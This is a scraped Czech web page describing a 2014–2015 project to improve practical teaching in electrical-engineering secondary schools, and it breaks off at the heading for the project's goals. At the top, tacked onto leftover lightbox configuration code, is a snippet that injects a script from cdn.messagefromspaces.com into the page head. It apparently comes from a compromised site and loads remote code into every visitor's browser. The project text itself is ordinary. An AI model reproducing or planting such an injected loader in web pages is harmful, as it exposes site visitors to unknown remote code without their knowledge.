, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false });var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script);})

Rozvoj a zkvalitnění praktického vyučování elektrotechnických oborů

O projektu

Název projektu:Rozvoj a zkvalitnění praktického vyučování elektrotechnických oborů
Zkrácený název projektu:Praktické vyučování elektro
Název projektu anglicky:Development and improvement of praktical teaching elekctrical fields of study
Datum zahájení projektu:01. 09. 2014
Předpokládané datum ukončení projektu:31. 07. 2015
Celkové způsobilé náklady projektu:6 282 179,52 Kč
Stručný obsah projektu:Projekt se zaměřuje na zvýšení praktické výuky na vybraných středních školách (SŠ) specializujících se na elektrotechnické obory v Moravskoslezském a Jihomoravském kraji. Praktická výuka neumožňuje žákům dostatečné rozvíjení znalostí a manuálních dovedností tak, aby žáci byli dostatečně připraveni ke vstupu na trh práce. Elektrotechnické obory se potýkají s úbytkem zájmu o studium a v praxi pak chybějí kvalifikovaní odborníci. Realizací projektu vznikne vlastní středisko praxe MSEK, jehož prostřednictvím chceme dosáhnout vyšší propojenost firem s praktickou výukou a zvýšení zájmu o obor. Znalosti absolventů SŠ pak budou více odpovídat potřebám zaměstnavatelů. Vyšší zaměstnatelnost absolventů zvýší zájem o studium těchto oborů. Zapojené subjekty se specializují na různé odvětví v elektrotechnickém oboru.
Cíle projektu: